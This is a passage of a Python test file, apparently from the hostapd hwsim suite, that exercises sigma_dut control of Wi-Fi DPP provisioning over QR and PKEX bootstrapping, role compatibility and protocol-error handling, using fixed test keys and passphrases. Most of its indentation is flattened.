"dpp_connector": ap_connector,
"dpp_csign": csign_pub,
"dpp_netaccesskey": ap_netaccesskey }
try:
hapd = hostapd.add_ap(apdev[0], params)
    except Exception:
raise HwsimSkip("DPP not supported")
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
        res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
        hex_uri = res.split(',')[3]
        uri = hex_uri.decode('hex')
logger.info("URI from sigma_dut: " + uri)
res = dev[1].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id1 = int(res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
t = threading.Thread(target=dpp_init_conf_mutual,
args=(dev[1], id1, conf_id, id0))
t.start()
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,20,DPPWaitForConnect,Yes"
if extra:
cmd += extra
res = sigma_dut_cmd(cmd, timeout=25)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def dpp_resp_conf_mutual(dev, conf_id, uri):
logger.info("Starting DPP responder/configurator in a thread")
dev.set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % ("DPPNET01".encode("hex"), conf_id));
cmd = "DPP_LISTEN 2437 role=configurator qr=mutual"
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP listen")
if uri:
ev = dev.wait_event(["DPP-SCAN-PEER-QR-CODE"], timeout=10)
if ev is None:
raise Exception("QR Code scan for mutual authentication not requested")
res = dev.request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=10)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP responder/configurator done")
def test_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev):
"""sigma_dut DPP/QR (mutual) initiator as Enrollee"""
run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, False)
def test_sigma_dut_dpp_qr_mutual_init_enrollee_pending(dev, apdev):
"""sigma_dut DPP/QR (mutual) initiator as Enrollee (response pending)"""
run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, True)
def run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, resp_pending):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg"
ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b"
params = { "ssid": "DPPNET01",
"wpa": "2",
"ieee80211w": "2",
"wpa_key_mgmt": "DPP",
"rsn_pairwise": "CCMP",
"dpp_connector": ap_connector,
"dpp_csign": csign_pub,
"dpp_netaccesskey": ap_netaccesskey }
try:
hapd = hostapd.add_ap(apdev[0], params)
    except Exception:
raise HwsimSkip("DPP not supported")
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
        res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
        hex_uri = res.split(',')[3]
        uri = hex_uri.decode('hex')
logger.info("URI from sigma_dut: " + uri)
if not resp_pending:
res = dev[1].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
uri = None
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
t = threading.Thread(target=dpp_resp_conf_mutual,
args=(dev[1], conf_id, uri))
t.start()
time.sleep(1)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,10,DPPWaitForConnect,Yes"
res = sigma_dut_cmd(cmd, timeout=15)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_init_enrollee_psk(dev, apdev):
"""sigma_dut DPP/QR initiator as Enrollee (PSK)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
params = hostapd.wpa2_params(ssid="DPPNET01",
passphrase="ThisIsDppPassphrase")
hapd = hostapd.add_ap(apdev[0], params)
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD"
        res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-psk ssid=%s pass=%s configurator=%d" % ("DPPNET01".encode("hex"), "ThisIsDppPassphrase".encode("hex"), conf_id));
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_init_enrollee_sae(dev, apdev):
"""sigma_dut DPP/QR initiator as Enrollee (SAE)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
if "SAE" not in dev[0].get_capability("auth_alg"):
raise HwsimSkip("SAE not supported")
params = hostapd.wpa2_params(ssid="DPPNET01",
passphrase="ThisIsDppPassphrase")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD"
        res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-sae ssid=%s pass=%s configurator=%d" % ("DPPNET01".encode("hex"), "ThisIsDppPassphrase".encode("hex"), conf_id));
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_init_configurator_1(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 1)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1)
def test_sigma_dut_dpp_qr_init_configurator_2(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 2)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 2)
def test_sigma_dut_dpp_qr_init_configurator_3(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 3)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 3)
def test_sigma_dut_dpp_qr_init_configurator_4(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 4)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 4)
def test_sigma_dut_dpp_qr_init_configurator_5(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 5)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 5)
def test_sigma_dut_dpp_qr_init_configurator_6(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 6)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 6)
def test_sigma_dut_dpp_qr_init_configurator_7(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 7)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 7)
def test_sigma_dut_dpp_qr_init_configurator_both(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator or Enrollee (conf index 1)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1, "Both")
def test_sigma_dut_dpp_qr_init_configurator_neg_freq(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (neg_freq)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1, extra='DPPSubsequentChannel,81/11')
def run_sigma_dut_dpp_qr_init_configurator(dev, apdev, conf_idx,
prov_role="Configurator",
extra=None):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,%s,DPPConfIndex,%d,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6" % (prov_role, conf_idx)
if extra:
cmd += "," + extra
res = sigma_dut_cmd(cmd)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_incompatible_roles_init(dev, apdev):
"""sigma_dut DPP roles incompatible (Initiator)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
        hex_uri = res.split(',')[3]
        uri = hex_uri.decode('hex')
logger.info("URI from sigma_dut: " + uri)
res = dev[1].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id1 = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6"
res = sigma_dut_cmd(cmd)
if "BootstrapResult,OK,AuthResult,ROLES_NOT_COMPATIBLE" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def dpp_init_enrollee_mutual(dev, id1, own_id):
logger.info("Starting DPP initiator/enrollee in a thread")
time.sleep(1)
cmd = "DPP_AUTH_INIT peer=%d own=%d role=enrollee" % (id1, own_id)
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-RECEIVED",
"DPP-NOT-COMPATIBLE"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Enrollee)")
logger.info("DPP initiator/enrollee done")
def test_sigma_dut_dpp_incompatible_roles_resp(dev, apdev):
"""sigma_dut DPP roles incompatible (Responder)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
res = sigma_dut_cmd(cmd)
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
        hex_uri = res.split(',')[3]
        uri = hex_uri.decode('hex')
logger.info("URI from sigma_dut: " + uri)
res = dev[1].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id1 = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
t = threading.Thread(target=dpp_init_enrollee_mutual, args=(dev[1], id1, id0))
t.start()
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6"
res = sigma_dut_cmd(cmd, timeout=10)
t.join()
if "BootstrapResult,OK,AuthResult,ROLES_NOT_COMPATIBLE" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_pkex_init_configurator(dev, apdev):
"""sigma_dut DPP/PKEX initiator as Configurator"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "DPP_BOOTSTRAP_GEN type=pkex"
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id1 = int(res)
cmd = "DPP_PKEX_ADD own=%d identifier=test code=secret" % (id1)
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to set PKEX data (responder)")
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCodeIdentifier,test,DPPPKEXCode,secret,DPPTimeout,6")
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def dpp_init_conf(dev, id1, conf, conf_id, extra):
logger.info("Starting DPP initiator/configurator in a thread")
cmd = "DPP_AUTH_INIT peer=%d conf=%s %s configurator=%d" % (id1, conf, extra, conf_id)
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP initiator/configurator done")
def test_sigma_dut_ap_dpp_qr(dev, apdev, params):
"""sigma_dut controlled AP (DPP)"""
run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-dpp", "sta-dpp")
def test_sigma_dut_ap_dpp_qr_legacy(dev, apdev, params):
"""sigma_dut controlled AP (legacy)"""
run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-psk", "sta-psk",
extra="pass=%s" % "qwertyuiop".encode("hex"))
def test_sigma_dut_ap_dpp_qr_legacy_psk(dev, apdev, params):
"""sigma_dut controlled AP (legacy)"""
run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-psk", "sta-psk",
extra="psk=%s" % (32*"12"))
def run_sigma_dut_ap_dpp_qr(dev, apdev, params, ap_conf, sta_conf, extra=""):
check_dpp_capab(dev[0])
logdir = os.path.join(params['logdir'], "sigma_dut_ap_dpp_qr.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
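            # Reset the sigma_dut controlled AP and select the DPP program.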
sigma_dut_cmd_check("ap_reset_default,program,DPP")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
            hex_uri = res.split(',')[3]
            uri = hex_uri.decode('hex')
logger.info("URI from sigma_dut: " + uri)
cmd = "DPP_CONFIGURATOR_ADD"
            res = dev[0].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
res = dev[0].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id1 = int(res)
t = threading.Thread(target=dpp_init_conf,
args=(dev[0], id1, ap_conf, conf_id, extra))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6")
t.join()
if "ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/1 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id1 = int(res)
uri1 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id1)
res = dev[0].request("DPP_QR_CODE " + uri1)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id0b = int(res)
dev[1].set("dpp_config_processing", "2")
cmd = "DPP_LISTEN 2412"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
cmd = "DPP_AUTH_INIT peer=%d conf=%s %s configurator=%d" % (id0b, sta_conf, extra, conf_id)
if "OK" not in dev[0].request(cmd):
raise Exception("Failed to initiate DPP Authentication")
dev[1].wait_connected()
sigma_dut_cmd_check("ap_reset_default")
finally:
dev[1].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_ap_dpp_pkex_responder(dev, apdev, params):
"""sigma_dut controlled AP as DPP PKEX responder"""
check_dpp_capab(dev[0])
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_dpp_pkex_responder.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_dpp_pkex_responder(dev, apdev)
finally:
stop_sigma_dut(sigma)
def dpp_init_conf_pkex(dev, conf_id, check_config=True):
logger.info("Starting DPP PKEX initiator/configurator in a thread")
time.sleep(1.5)
cmd = "DPP_BOOTSTRAP_GEN type=pkex"
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id = int(res)
cmd = "DPP_PKEX_ADD own=%d init=1 conf=ap-dpp configurator=%d code=password" % (id, conf_id)
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to initiate DPP PKEX")
if not check_config:
return
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP initiator/configurator done")
def run_sigma_dut_ap_dpp_pkex_responder(dev, apdev):
sigma_dut_cmd_check("ap_reset_default,program,DPP")
cmd = "DPP_CONFIGURATOR_ADD"
    res = dev[0].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
t = threading.Thread(target=dpp_init_conf_pkex, args=(dev[0], conf_id))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,PKEX,DPPPKEXCode,password,DPPTimeout,6,DPPWaitForConnect,No", timeout=10)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
sigma_dut_cmd_check("ap_reset_default")
def test_sigma_dut_dpp_pkex_responder_proto(dev, apdev):
"""sigma_dut controlled STA as DPP PKEX responder and error case"""
check_dpp_capab(dev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_pkex_responder_proto(dev, apdev)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_pkex_responder_proto(dev, apdev):
cmd = "DPP_CONFIGURATOR_ADD"
    res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
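    # dpp_test=44 enables a protocol-testing behavior on the peer that
    # prevents the PKEX exchange from completing, so the expected outcome
    # below is BootstrapResult,Timeout.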
dev[1].set("dpp_test", "44")
t = threading.Thread(target=dpp_init_conf_pkex, args=(dev[1], conf_id,
False))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPProvisioningRole,Enrollee,DPPBS,PKEX,DPPPKEXCode,password,DPPTimeout,6", timeout=10)
t.join()
if "BootstrapResult,Timeout" not in res:
raise Exception("Unexpected result: " + res)
def dpp_proto_init(dev, id1):
time.sleep(1)
logger.info("Starting DPP initiator/configurator in a thread")
cmd = "DPP_CONFIGURATOR_ADD"
    res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
cmd = "DPP_AUTH_INIT peer=%d conf=sta-dpp configurator=%d" % (id1, conf_id)
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
def test_sigma_dut_dpp_proto_initiator(dev, apdev):
"""sigma_dut DPP protocol testing - Initiator"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
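    # Each tuple: (DPPStep, DPPFrameType, DPPIEAttribute, expected sigma_dut
    # result string, expected DPP-FAIL reason on the peer or None).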
tests = [ ("InvalidValue", "AuthenticationRequest", "WrappedData",
"BootstrapResult,OK,AuthResult,Errorsent",
None),
("InvalidValue", "AuthenticationConfirm", "WrappedData",
"BootstrapResult,OK,AuthResult,Errorsent",
None),
("MissingAttribute", "AuthenticationRequest", "InitCapabilities",
"BootstrapResult,OK,AuthResult,Errorsent",
"Missing or invalid I-capabilities"),
("InvalidValue", "AuthenticationConfirm", "InitAuthTag",
"BootstrapResult,OK,AuthResult,Errorsent",
"Mismatching Initiator Authenticating Tag"),
("MissingAttribute", "ConfigurationResponse", "EnrolleeNonce",
"BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent",
"Missing or invalid Enrollee Nonce attribute") ]
for step, frame, attr, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_initiator(dev, step, frame, attr, result,
fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_initiator(dev, step, frame, attr, result, fail):
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr),
timeout=10)
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly: " + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_responder(dev, apdev):
"""sigma_dut DPP protocol testing - Responder"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
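    # Tuple fields as in test_sigma_dut_dpp_proto_initiator() above.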
tests = [ ("MissingAttribute", "AuthenticationResponse", "DPPStatus",
"BootstrapResult,OK,AuthResult,Errorsent",
